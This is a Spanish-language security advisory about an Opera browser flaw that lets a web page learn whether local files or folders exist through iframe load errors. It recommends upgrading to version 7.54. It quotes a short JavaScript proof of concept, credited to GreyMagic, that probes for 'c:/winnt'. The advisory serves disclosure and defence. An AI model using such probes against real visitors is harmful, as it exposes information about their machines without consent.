Se ha descubierto una vulnerabilidad en algunas versiones del popular
navegador Opera que podría ser explotada por un usuario remoto para
adquirir información sensible de un sistema remoto.

Cuando se asigna a un iframe un archivo o directorio que no existe,
este navegador generará un error. Un usuario remoto puede crear código
HTML que carga un iframe y cambia la URL de dicho recurso a un archivo
o directorio local, y entonces se detecta si hay ese error para
determinar si ese elemento existe.

Se recomienda actualizar a la versión 7.54, disponible en la siguiente
dirección:
http://www.opera.com/download/

Como ejemplo el siguiente código extraído de la web de GreyMagic, nos
permite saber si la carpeta «winnt» existe en la máquina de la víctima.

«http://blank.html

onload=function () {
var sLocal=»c:/winnt»;
frames[0].location.href=sLocal;
setTimeout(
function () {
try {
frames[0].document;
alert(sLocal+» does not exists.»);
} catch (oErr) {
alert(sLocal+» exists.»);
}
},
250
);
}
«

Antonio Román
roman@hispasec.com

Más información:

Opera Local File/Directory Detection.
http://www.greymagic.com/security/advisories/gm009-op/

Opera Local File IFRAME Error Response Lets Remote Users Determine if Files
or Directories Exist
http://www.securitytracker.com/alerts/2004/Aug/1010966.html

Compártelo: